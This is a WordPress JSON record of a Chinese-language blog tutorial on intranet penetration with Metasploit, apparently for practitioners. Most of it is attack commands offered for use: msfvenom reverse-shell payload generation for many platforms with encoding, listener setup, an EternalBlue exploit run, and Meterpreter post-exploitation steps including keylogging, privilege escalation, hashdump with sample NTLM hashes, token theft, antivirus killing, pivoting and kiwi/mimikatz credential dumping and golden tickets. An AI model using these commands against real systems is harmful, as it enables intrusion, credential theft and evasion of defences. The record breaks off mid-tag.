{"id":724,"date":"2025-10-24T14:24:03","date_gmt":"2025-10-24T06:24:03","guid":{"rendered":"https:\/\/www.youvii.site\/?p=724"},"modified":"2025-10-24T14:35:44","modified_gmt":"2025-10-24T06:35:44","slug":"metasploitneiwangshentou","status":"publish","type":"post","link":"https:\/\/www.youvii.site\/index.php\/archives\/metasploitneiwangshentou","title":{"rendered":"metasploit\u5185\u7f51\u6e17\u900f"},"content":{"rendered":"<h1>metasploit \u5185\u7f51\u6e17\u900f<\/h1>\n<h1>\u6982\u8ff0<\/h1>\n<p>Metasploit\u5c31\u662f\u4e00\u4e2a\u6f0f\u6d1e\u6846\u67b6\u3002\u5b83\u7684\u5168\u79f0\u53eb\u505aThe Metasploit Framework\uff0c\u7b80\u79f0\u53eb\u505aMSF\u3002Metasploit\u4f5c\u4e3a\u5168\u7403\u6700\u53d7\u6b22\u8fce\u7684\u5de5\u5177\uff0c\u4e0d\u4ec5\u4ec5\u662f\u56e0\u4e3a\u5b83\u7684\u65b9\u4fbf\u6027\u548c\u5f3a\u5927\u6027\uff0c\u66f4\u91cd\u8981\u7684\u662f\u5b83\u7684\u6846\u67b6\u3002\u5b83\u5141\u8bb8\u4f7f\u7528\u8005\u5f00\u53d1\u81ea\u5df1\u7684\u6f0f\u6d1e\u811a\u672c\uff0c\u4ece\u800c\u8fdb\u884c\u6d4b\u8bd5<\/p>\n<h1>\u57fa\u672c\u64cd\u4f5c<\/h1>\n<h2>\u8fd0\u884c<\/h2>\n<p>Shell\u4e2d\u76f4\u63a5\u8f93\u5165msfconsole<\/p>\n<h2>\u5efa\u7acb\u641c\u7d22\u7f13\u5b58\uff08\u6570\u636e\u5e93\uff09<\/h2>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">\u542f\u52a8PostgreSQL\u6570\u636e\u5e93\u670d\u52a1 \uff1aservice postgresql start \u76d1\u542c5432\u7aef\u53e3\n\u521d\u59cb\u5316Metasploit\u6570\u636e\u5e93 \uff1amsfdb init\n\u67e5\u770b\u6570\u636e\u5e93\u8054\u63a5\u60c5\u51b5 \uff1amsfconsole db_status\n\u5efa\u7acb\u6570\u636e\u5e93\u7f13\u5b58 \uff1amsfconsole db_rebuild_cache<\/code><\/pre>\n<h2>\u4e13\u4e1a\u672f\u8bed<\/h2>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">\u2013 Exploit\uff0c\u653b\u51fb\u5de5\u5177\/\u4ee3\u7801\n\u2013 Payload\uff0c\u653b\u51fb\u8f7d\u8377\n\u2013 Shellcode shell \u4ee3\u7801\n\u2013 Module\uff0c\u6a21\u5757\n\u2013 Listener\uff0c\u76d1\u542c\u5668<\/code><\/pre>\n<h2>Metasploit\u4e3b\u76ee\u5f55<\/h2>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">Kali Linux \/usr\/share\/metasploit-framework<\/code><\/pre>\n<h2>\u547d\u4ee4<\/h2>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">show exploits \u2013 \u67e5\u770b\u6240\u6709\u53ef\u7528\u7684\u6e17\u900f\u653b\u51fb\u7a0b\u5e8f\u4ee3\u7801\nshow auxiliary \u2013 \u67e5\u770b\u6240\u6709\u53ef\u7528\u7684\u8f85\u52a9\u653b\u51fb\u5de5\u5177\nshow options \u2013 \u67e5\u770b\u8be5\u6a21\u5757\u6240\u6709\u53ef\u7528\u9009\u9879\nshow payloads \u2013 \u67e5\u770b\u8be5\u6a21\u5757\u9002\u7528\u7684\u6240\u6709\u8f7d\u8377\u4ee3\u7801\nshow targets \u2013 \u67e5\u770b\u8be5\u6a21\u5757\u9002\u7528\u7684\u653b\u51fb\u76ee\u6807\u7c7b\u578b\nsearch \u2013 \u6839\u636e\u5173\u952e\u5b57\u641c\u7d22\u67d0\u6a21\u5757\ninfo \u2013 \u663e\u793a\u67d0\u6a21\u5757\u7684\u8be6\u7ec6\u4fe1\u606f\nuse \u2013 \u8fdb\u5165\u4f7f\u7528\u67d0\u6e17\u900f\u653b\u51fb\u6a21\u5757\nback \u2013 \u56de\u9000 set\/unset \u2013 \u8bbe\u7f6e\/\u7981\u7528\u6a21\u5757\u4e2d\u7684\u67d0\u4e2a\u53c2\u6570\nsetg\/unsetg \u2013 \u8bbe\u7f6e\/\u7981\u7528\u9002\u7528\u4e8e\u6240\u6709\u6a21\u5757\u7684\u5168\u5c40\u53c2\u6570\nsave \u2013 \u5c06\u5f53\u524d\u8bbe\u7f6e\u503c\u4fdd\u5b58\u4e0b\u6765\uff0c\u4ee5\u4fbf\u4e0b\u6b21\u542f\u52a8MSF\u7ec8\u7aef\u65f6\u4ecd\u53ef\u4f7f\u7528\nCd \u66f4\u6539\u5f53\u524d\u7684\u5de5\u4f5c\u76ee\u5f55<\/code><\/pre>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">Sessions \u8f6c\u50a8\u4f1a\u8bdd\u5217\u8868\u5e76\u663e\u793a\u6709\u5173\u4f1a\u8bdd\u7684\u4fe1\u606f\nColor \u5207\u6362\u989c\u8272\nSet \u5c06\u7279\u5b9a\u4e8e\u4e0a\u4e0b\u6587\u7684\u53d8\u91cf\u8bbe\u7f6e\u4e3a\u4e00\u4e2a\u503c\nConnect \u8fde\u63a5\u4e0e\u4e3b\u673a\u901a\u4fe1\nSetg \u5c06\u5168\u5c40\u53d8\u91cf\u8bbe\u7f6e\u4e3a\u4e00\u4e2a\u503c\nexit \u9000\u51fa\u63a7\u5236\u53f0\nsleep \u5728\u6307\u5b9a\u7684\u79d2\u6570\u5185\u4e0d\u505a\u4efb\u4f55\u4e8b\u60c5\nget \u83b7\u53d6\u7279\u5b9a\u4e8e\u4e0a\u4e0b\u6587\u7684\u53d8\u91cf\u7684\u503c\nspool \u5c06\u63a7\u5236\u53f0\u8f93\u51fa\u5199\u5165\u6587\u4ef6\u4ee5\u53ca\u5c4f\u5e55\ngetg \u83b7\u53d6\u5168\u5c40\u53d8\u91cf\u7684\u503c\nthreads \u7ebf\u7a0b\u67e5\u770b\u548c\u64cd\u4f5c\u540e\u53f0\u7ebf\u7a0b\ngrep grep \u53e6\u4e00\u4e2a\u547d\u4ee4\u7684\u8f93\u51fa\nunload \u5378\u8f7d\u6846\u67b6\u63d2\u4ef6\nhistory \u663e\u793a\u547d\u4ee4\u5386\u53f2\nunset \u53d6\u6d88\u8bbe\u7f6e\u4e00\u4e2a\u6216\u591a\u4e2a\u7279\u5b9a\u4e8e\u4e0a\u4e0b\u6587\u7684\u53d8\u91cf\nirb \u8fdb\u5165irb\u811a\u672c\u6a21\u5f0f\nunsetg \u53d6\u6d88\u8bbe\u7f6e\u4e00\u4e2a\u6216\u591a\u4e2a\u5168\u5c40\u53d8\u91cf\nload \u52a0\u8f7d\u4e00\u4e2a\u6846\u67b6\u63d2\u4ef6\nversion \u663e\u793a\u6846\u67b6\u548c\u63a7\u5236\u53f0\u5e93\u7248\u672c\u53f7\nquit \u9000\u51fa\u63a7\u5236\u53f0\nroute \u901a\u8fc7\u4f1a\u8bdd\u8def\u7531\u6d41\u91cf\nsave \u4fdd\u5b58\u6d3b\u52a8\u7684\u6570\u636e\u5b58\u50a8<\/code><\/pre>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">analyze \u5206\u6790\u6709\u5173\u7279\u5b9a\u5730\u5740\u6216\u5730\u5740\u8303\u56f4\u7684\u6570\u636e\u5e93\u4fe1\u606f\ndb_connect \u8fde\u63a5\u5230\u73b0\u6709\u6570\u636e\u670d\u52a1\ndb_disconnect \u65ad\u5f00\u4e0e\u5f53\u524d\u6570\u636e\u670d\u52a1\u7684\u8fde\u63a5\ndb_export \u5bfc\u51fa\u5305\u542b\u6570\u636e\u5e93\u5185\u5bb9\u7684\u6587\u4ef6\ndb_import \u5bfc\u5165\u626b\u63cf\u7ed3\u679c\u6587\u4ef6\uff08\u5c06\u81ea\u52a8\u68c0\u6d4b\u6587\u4ef6\u7c7b\u578b\uff09\ndb_nmap \u6267\u884cnmap\u5e76\u81ea\u52a8\u8bb0\u5f55\u8f93\u51fa\ndb_rebuild_cache \u91cd\u5efa\u6570\u636e\u5e93\u5b58\u50a8\u7684\u6a21\u5757\u9ad8\u901f\u7f13\u5b58\ndb_remove \u5220\u9664\u5df2\u4fdd\u5b58\u7684\u6570\u636e\u670d\u52a1\u6761\u76ee\ndb_save \u5c06\u5f53\u524d\u6570\u636e\u670d\u52a1\u8fde\u63a5\u4fdd\u5b58\u4e3a\u542f\u52a8\u65f6\u91cd\u65b0\u8fde\u63a5\u7684\u9ed8\u8ba4\u503c\ndb_status \u663e\u793a\u5f53\u524d\u6570\u636e\u670d\u52a1\u72b6\u6001\nhosts \u5217\u51fa\u6570\u636e\u5e93\u4e2d\u7684\u6240\u6709\u4e3b\u673a\nloot \u5217\u51fa\u6570\u636e\u5e93\u4e2d\u7684\u6240\u6709\u6218\u5229\u54c1\nnotes \u5217\u51fa\u6570\u636e\u5e93\u4e2d\u7684\u6240\u6709\u6ce8\u91ca\nservices \u5217\u51fa\u6570\u636e\u5e93\u4e2d\u7684\u6240\u6709\u670d\u52a1\nvulns \u5217\u51fa\u6570\u636e\u5e93\u4e2d\u7684\u6240\u6709\u6f0f\u6d1e\nworkspace \u5728\u6570\u636e\u5e93\u5de5\u4f5c\u533a\u4e4b\u95f4\u5207\u6362<\/code><\/pre>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">creds \u5217\u51fa\u6570\u636e\u5e93\u4e2d\u7684\u6240\u6709\u51ed\u636e<\/code><\/pre>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">Advanced \u663e\u793a\u4e00\u4e2a\u6216\u591a\u4e2a\u6a21\u5757\u7684\u9ad8\u7ea7\u9009\u9879\nBack \u4ece\u5f53\u524d\u4e0a\u4e0b\u6587\u8fd4\u56de\nEdit \u4f7f\u7528\u9996\u9009\u7f16\u8f91\u5668\u7f16\u8f91\u5f53\u524d\u6a21\u5757\ninfo \u663e\u793a\u6709\u5173\u4e00\u4e2a\u6216\u591a\u4e2a\u6a21\u5757\u7684\u4fe1\u606f\nloadpath \u8def\u5f84\u4ece\u8def\u5f84\u641c\u7d22\u5e76\u52a0\u8f7d\u6a21\u5757\noptions \u663e\u793a\u5168\u5c40\u9009\u9879\u6216\u4e00\u4e2a\u6216\u591a\u4e2a\u6a21\u5757\npopm \u5c06\u6700\u65b0\u7684\u6a21\u5757\u4ece\u5806\u6808\u4e2d\u5f39\u51fa\u5e76\u4f7f\u5176\u5904\u4e8e\u6d3b\u52a8\u72b6\u6001\nprevious \u5c06\u4e4b\u524d\u52a0\u8f7d\u7684\u6a21\u5757\u8bbe\u7f6e\u4e3a\u5f53\u524d\u6a21\u5757\npushm \u5c06\u6d3b\u52a8\u6216\u6a21\u5757\u5217\u8868\u63a8\u5165\u6a21\u5757\u5806\u6808\nreload_all \u4ece\u6240\u6709\u5b9a\u4e49\u7684\u6a21\u5757\u8def\u5f84\u91cd\u65b0\u52a0\u8f7d\u6240\u6709\u6a21\u5757\nsearch \u641c\u7d22\u6a21\u5757\u540d\u79f0\u548c\u63cf\u8ff0\nshow \u663e\u793a\u7ed9\u5b9a\u7c7b\u578b\u7684\u6a21\u5757\u6216\u6240\u6709\u6a21\u5757\nuse \u6309\u540d\u79f0\u9009\u62e9\u6a21\u5757\nenumdesktops #\u67e5\u770b\u53ef\u7528\u7684\u684c\u9762\ngetdesktop #\u83b7\u53d6\u5f53\u524dmeterpreter \u5173\u8054\u7684\u684c\u9762\nsetdesktop #\u8bbe\u7f6emeterpreter\u5173\u8054\u7684\u684c\u9762 -h\u67e5\u770b\u5e2e\u52a9\nscreenshot #\u622a\u5c4f\nrun vnc #\u4f7f\u7528vnc\u8fdc\u7a0b\u684c\u9762\u8fde\u63a5<\/code><\/pre>\n<h1>Metasploit\u529f\u80fd\u7a0b\u5e8f<\/h1>\n<p>msfvenom \uff08\u653b\u51fb\u8f7d\u8377\u751f\u6210\u548c\u7f16\u7801\u5668\uff09<\/p>\n<p>\u4e3b\u8981\u53c2\u6570\uff1a<\/p>\n<blockquote>\n<p>-p payload<\/p>\n<p>-e \u7f16\u7801\u65b9\u5f0f<\/p>\n<p>-i \u7f16\u7801\u6b21\u6570<\/p>\n<p>-b \u5728\u751f\u6210\u7684\u7a0b\u5e8f\u4e2d\u907f\u514d\u51fa\u73b0\u7684\u503cLHOST,LPORT \u76d1\u542c\u4e0a\u7ebf\u7684\u4e3b\u673aIP\u548c\u7aef\u53e3<\/p>\n<p>-f exe \u751f\u6210EXE\u683c\u5f0f\u4f7f\u7528msfvenom<\/p>\n<p>-l \u53ef\u4ee5\u67e5\u770b\u53ef\u4ee5\u5229\u7528payload msfvenom -l| grep windows | grep x64 | grep tcp \u9009\u62e9payload<\/p>\n<\/blockquote>\n<h2>\u751f\u6210\u53ef\u6267\u884c\u6587\u4ef6<\/h2>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">Linux:\nmsfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f elf &gt; shell.elf\nWindows:\nmsfvenom -p windows\/meterpreter\/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f exe &gt; shell.exe\nMac:\nmsfvenom -p osx\/x86\/shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f macho &gt; shell.macho\nPHP:\nmsfvenom -p php\/meterpreter_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.php\ncat shell.php | pbcopy &amp;&amp; echo '&lt;?php ' | tr -d 'n' &gt; shell.php &amp;&amp; pbpaste &gt;&gt; shell.php\nASP:\nmsfvenom -p windows\/meterpreter\/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f asp &gt; shell.asp\nJSP:\nmsfvenom -p java\/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.jsp\nWAR:\nmsfvenom -p java\/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f war &gt; shell.war\nPython:\nmsfvenom -p cmd\/unix\/reverse_python LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.py\nBash:\nmsfvenom -p cmd\/unix\/reverse_bash LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.sh\nPerl:\nmsfvenom -p cmd\/unix\/reverse_perl LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.pl<\/code><\/pre>\n<h2>\u76d1\u542c<\/h2>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">set PAYLOAD &lt;Payload name&gt;\nset LHOST &lt;LHOST value&gt;\nset LPORT &lt;LPORT value&gt;\nset ExitOnSession false \u8ba9connection\u4fdd\u6301\u8fde\u63a5(\u5373\u4f7f\u4e00\u4e2a\u8fde\u63a5\u9000\u51fa,\u4ecd\u7136\u4fdd\u6301listening\u72b6\u6001)\nexploit -j \u2013z -j(\u4f5c\u4e3ajob\u5f00\u59cb\u8fd0\u884c)\u548c-z(\u4e0d\u7acb\u5373\u8fdb\u884csession\u4ea4\u6362--\u4e5f\u5373\u662f\u81ea\u52a8\u540e\u53f0\u8fd0\u884c)\n12345<\/code><\/pre>\n<p>\u4e5f\u53ef\u4ee5\u5728\u542f\u52a8\u7684\u65f6\u5019\u76d1\u542c<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">msfconsole -x \"use exploit\/multi\/handler; set payload\nwindows\/meterpreter\/reverse_http; set lhost 127.0.0.1; set lport 1234; exploit -\nj; \"<\/code><\/pre>\n<p>\u9ad8\u7ea7\u9009\u9879<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">set PrependMigrate true \u81ea\u52a8\u6dfb\u52a0\u65b0\u8fdb\u7a0b<\/code><\/pre>\n<h2>\u5b9e\u4f8b<\/h2>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">msfvenom -p windows\/x64\/meterpreter\/reverse_tcp -e x86\/shikata_ga_nai -i 5 -b\n'x00' LHOST=172.16.0.4 LPORT=443 -f exe &gt; abc.exe\nmsfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=172.16.0.4 LPORT=443 -f exe\n&gt; abc.exe<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2fc7d457.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746687095468-d649d1ae-fc77-4152-a717-1ae18310ef56.png\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">msf &gt; use exploit\/multi\/handler\nmsf exploit(handler) &gt; set payload windows\/x64\/meterpreter\/reverse_tcp\nmsf exploit(handler) &gt; show options\nmsf exploit(handler) &gt; set LHOST 172.16.0.4\nmsf exploit(handler) &gt; set ExitOnSession false\nset ExitOnSession false \u8ba9connection\u4fdd\u6301\u8fde\u63a5(\u5373\u4f7f\u4e00\u4e2a\u8fde\u63a5\u9000\u51fa,\u4ecd\u7136\u4fdd\u6301listening\u72b6\u6001)\nmsf exploit(handler) &gt; exploit -j -z\n-j(\u8ba1\u5212\u4efb\u52a1\u4e0b\u8fdb\u884c\u653b\u51fb\uff0c\u540e\u53f0) -z(\u653b\u51fb\u5b8c\u6210\u4e0d\u9047\u4f1a\u8bdd\u4ea4\u4e92)\nmsf exploit(handler) &gt; jobs \u67e5\u770b\u540e\u53f0\u653b\u51fb\u4efb\u52a1\nmsf exploit(handler) &gt; kill &lt;id&gt; \u505c\u6b62\u67d0\u540e\u53f0\u653b\u51fb\u4efb\u52a1\nmsf exploit(handler) &gt; sessions -l (\u67e5\u770b\u4f1a\u8bdd)<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2ff6d132.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746687116338-203abe4e-d170-4483-a6c3-c1905ec567c8.png\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">backgroup \u653e\u7f6e\u540e\u53f0\nmsf exploit(handler) &gt; sessions 1 \u9009\u62e9\u4f1a\u8bdd\nmsf exploit(handler) &gt; sessions -k 1 \u7ed3\u675f\u4f1a\u8bdd<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae302abb11.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746687127171-b89b3c31-bfd5-45a9-9711-1d71d42d1219.png\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">Ctrl+z \u628a\u4f1a\u8bdd\u653e\u5230\u540e\u53f0\nCtrl+c \u7ed3\u675f\u4f1a\u8bdd<\/code><\/pre>\n<h1>Meterpreter\u540e\u653b\u51fb<\/h1>\n<p>Meterpreter\u63d0\u4f9b\u7684\u529f\u80fd\u5305\u62ec\u53cd\u8ffd\u8e2a\u3001\u7eaf\u5185\u5b58\u5de5\u4f5c\u6a21\u5f0f\u3001\u7cfb\u7edf \u4fe1\u606f\u83b7\u53d6\u3001\u5bc6\u7801\u54c8\u5e0c\u5bfc\u51fa\u3001\u6587\u4ef6\u4e0a\u4f20\u4e0b\u8f7d\u3001\u5c4f\u5e55\u622a\u53d6\u3001\u952e\u76d8\u8bb0 \u5f55\u3001\u6743\u9650\u63d0\u5347\u3001\u8df3\u677f\u653b\u51fb\u7b49\u7b49<\/p>\n<h2>\u5e38\u7528\u547d\u4ee4<\/h2>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">meterpreter &gt; background \u653e\u56de\u540e\u53f0\nmeterpreter &gt; exit \u5173\u95ed\u4f1a\u8bdd\nmeterpreter &gt; help \u5e2e\u52a9\u4fe1\u606f\nmeterpreter &gt; Sysinfo \u7cfb\u7edf\u5e73\u53f0\u4fe1\u606f\nmeterpreter &gt; screenshot \u5c4f\u5e55\u622a\u53d6\nmeterpreter &gt; shell \u547d\u4ee4\u884cshell (exit\u9000\u51fa)\nmeterpreter &gt; getlwd \u67e5\u770b\u672c\u5730\u76ee\u5f55\nmeterpreter &gt; lcd \u5207\u6362\u672c\u5730\u76ee\u5f55\nmeterpreter &gt; getwd \u67e5\u770b\u76ee\u5f55\nmeterpreter &gt; ls \u67e5\u770b\u6587\u4ef6\u76ee\u5f55\u5217\u8868\nmeterpreter &gt; cd \u5207\u6362\u76ee\u5f55\nmeterpreter &gt; rm \u5220\u9664\u6587\u4ef6\nmeterpreter &gt; download C:\\Users\\123\\Desktop\\1.txt 1.txt \u4e0b\u8f7d\u6587\u4ef6\nmeterpreter &gt; upload \/var\/www\/wce.exe wce.exe \u4e0a\u4f20\u6587\u4ef6\nmeterpreter &gt; search -d c: -f *.doc \u641c\u7d22\u6587\u4ef6\nmeterpreter &gt; execute -f cmd.exe -i \u6267\u884c\u7a0b\u5e8f\/\u547d\u4ee4\nmeterpreter &gt; ps \u67e5\u770b\u8fdb\u7a0b\nmeterpreter &gt; run post\/windows\/capture\/keylog_recorder \u952e\u76d8\u8bb0\u5f55\nmeterpreter &gt; getuid \u67e5\u770b\u5f53\u524d\u7528\u6237\u6743\u9650\nmeterpreter &gt; use priv \u52a0\u8f7d\u7279\u6743\u6a21\u5757\nmeterpreter &gt; getsystem \u63d0\u5347\u5230SYSTEM\u6743\u9650\nmeterpreter &gt; hashdump \u5bfc\u51fa\u5bc6\u7801\u6563\u5217\nmeterpreter &gt; ps \u67e5\u770b\u9ad8\u6743\u9650\u7528\u6237PID\nmeterpreter &gt; steal_token &lt;PID&gt; \u7a83\u53d6\u4ee4\u724c\nmeterpreter &gt; rev2self \u6062\u590d\u539f\u6765\u7684\u4ee4\u724c\nmeterpreter &gt; migrate pid \u8fc1\u79fb\u8fdb\u7a0b\nmeterpreter &gt; run killav \u5173\u95ed\u6740\u6bd2\u8f6f\u4ef6\nmeterpreter &gt; run getgui-e \u542f\u7528\u8fdc\u7a0b\u684c\u9762\nmeterpreter &gt; portfwd add -l 1234 -p 3389 -r &lt;\u76ee\u6807IP&gt; \u7aef\u53e3\u8f6c\u53d1\nmeterpreter &gt; run get_local_subnets \u83b7\u53d6\u5185\u7f51\u7f51\u6bb5\u4fe1\u606f\nmeterpreter &gt; run autoroute -s &lt;\u5185\u7f51\u7f51\u6bb5&gt; \u521b\u5efa\u81ea\u52a8\u8def\u7531\nmeterpreter &gt; run autoroute -p \u67e5\u770b\u81ea\u52a8\u8def\u7531\u8868<\/code><\/pre>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">msf &gt; use auxiliary\/server\/socks4a \u8bbe\u7f6esocks4\u4ee3\u7406\u6a21\u5757\nmsf auxiliary(socks4a) &gt; show options\nmsf auxiliary(socks4a) &gt; run<\/code><\/pre>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">nano \/etc\/proxychains.conf \u4fee\u6539\u4ee3\u7406\u76d1\u542c\u7aef\u53e3,\u548c\u524d\u9762\u7aef\u53e3\u4e00\u81f4\nquite_mode \u8bbe\u7f6e\u6210\u5b89\u9759\u6a21\u5f0f\uff1a\u53bb\u6389\u5982\u4e0b\u53c2\u6570\u524d\u9762\u7684\u6ce8\u91ca<\/code><\/pre>\n<h1>\u73b0\u5bf9\u76ee\u6807\u4e3b\u673a\u8fdb\u884c\u81ea\u52a8\u6f0f\u6d1e\u653b\u51fb<\/h1>\n<p>db_nmap + db_autopwn<\/p>\n<p>\u9879\u76ee\u5730\u5740 <a href=\"https:\/\/github.com\/hahwul\/metasploit-autopwn\">https:\/\/github.com\/hahwul\/metasploit-autopwn<\/a><\/p>\n<p>\u590d\u5236\u5230\u63d2\u4ef6\u76ee\u5f55<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">cp db_autopwn.rb \/opt\/metasploit-framework\/plugins<\/code><\/pre>\n<p>\u52a0\u8f7d\u63d2\u4ef6<\/p>\n<p>load db_autopwn<\/p>\n<p>\u4f7f\u7528\u8bf4\u660e<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">db_autopwn\n[*] Usage: db_autopwn [options]\n-h Display this help text\n-t Show all matching exploit modules\n-x Select modules based on vulnerability references\n-p Select modules based on open ports\n-e Launch exploits against all matched targets\n-r Use a reverse connect shell\n-b Use a bind shell on a random port (default)\n-q Disable exploit module output\n-R [rank] Only run modules with a minimal rank\n-I [range] Only exploit hosts inside this range\n-X [range] Always exclude hosts inside this range\n-PI [range] Only exploit hosts with these ports open\n-PX [range] Always exclude hosts with these ports open\n-m [regex] Only run modules whose name matches the regex\n-T [secs] Maximum runtime for any exploit in seconds<\/code><\/pre>\n<p>\u5e38\u7528\u547d\u4ee4<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">db_autopwn -t -p -r\ndb_autopwn -p -m exploit\/windows\/smb\/ms17_010_eternalblue -e<\/code><\/pre>\n<h1>\u5185\u7f51\u6e17\u900f ms17_010_eternalblue \u6c38\u6052\u4e4b\u84dd \u83b7\u53d6\u6743\u9650<\/h1>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">use exploit\/windows\/smb\/ms17_010_eternalblue\nset payload windows\/x64\/meterpreter\/reverse_tcp\nset rhost 10.10.10.136\nset lport 4444\nexploit<\/code><\/pre>\n<h1><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae305cf688.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746687305605-01b31fe9-7e2e-473f-baeb-4550abda7056.png\" \/><\/h1>\n<h1>\u5185\u7f51\u6e17\u900f \u83b7\u53d6hash\u548c\u660e\u6587<\/h1>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">meterpreter &gt; hashdump\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba8854737681\n8d4:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nmeterpreter &gt;\nrun hashdump<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae308d9b19.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746687334492-24693e1b-45f5-423e-9bcb-2665d140391c.png\" \/><\/p>\n<p>\u5728\u6700\u65b0\u7684\u7248\u672c\u4e2dload mimikatz\u5df2\u7ecf\u53d6\u6d88 \u73b0\u5728\u4f7f\u7528kiwi\u6a21\u5757<\/p>\n<p>load kiwi<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">creds_all\uff1a\u5217\u4e3e\u6240\u6709\u51ed\u636e\ncreds_kerberos\uff1a\u5217\u4e3e\u6240\u6709kerberos\u51ed\u636e\ncreds_msv\uff1a\u5217\u4e3e\u6240\u6709msv\u51ed\u636e\ncreds_ssp\uff1a\u5217\u4e3e\u6240\u6709ssp\u51ed\u636e\ncreds_tspkg\uff1a\u5217\u4e3e\u6240\u6709tspkg\u51ed\u636e\ncreds_wdigest\uff1a\u5217\u4e3e\u6240\u6709wdigest\u51ed\u636e\ndcsync\uff1a\u901a\u8fc7DCSync\u68c0\u7d22\u7528\u6237\u5e10\u6237\u4fe1\u606f\ndcsync_ntlm\uff1a\u901a\u8fc7DCSync\u68c0\u7d22\u7528\u6237\u5e10\u6237NTLM\u6563\u5217\u3001SID\u548cRID\ngolden_ticket_create\uff1a\u521b\u5efa\u9ec4\u91d1\u7968\u636e\nkerberos_ticket_list\uff1a\u5217\u4e3ekerberos\u7968\u636e\nkerberos_ticket_purge\uff1a\u6e05\u9664kerberos\u7968\u636e\nkerberos_ticket_use\uff1a\u4f7f\u7528kerberos\u7968\u636e\nkiwi_cmd\uff1a\u6267\u884cmimikatz\u7684\u547d\u4ee4\uff0c\u540e\u9762\u63a5mimikatz.exe\u7684\u547d\u4ee4\nlsa_dump_sam\uff1adump\u51falsa\u7684SAM\nlsa_dump_secrets\uff1adump\u51falsa\u7684\u5bc6\u6587\npassword_change\uff1a\u4fee\u6539\u5bc6\u7801\nwifi_list\uff1a\u5217\u51fa\u5f53\u524d\u7528\u6237\u7684wifi\u914d\u7f6e\u6587\u4ef6\nwifi_list_shared\uff1a\u5217\u51fa\u5171\u4eabwifi\u914d\u7f6e\u6587\u4ef6\/\u7f16\u7801<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae30c4e7f4.png\" class=\"lazy\" loading=\"lazy\" 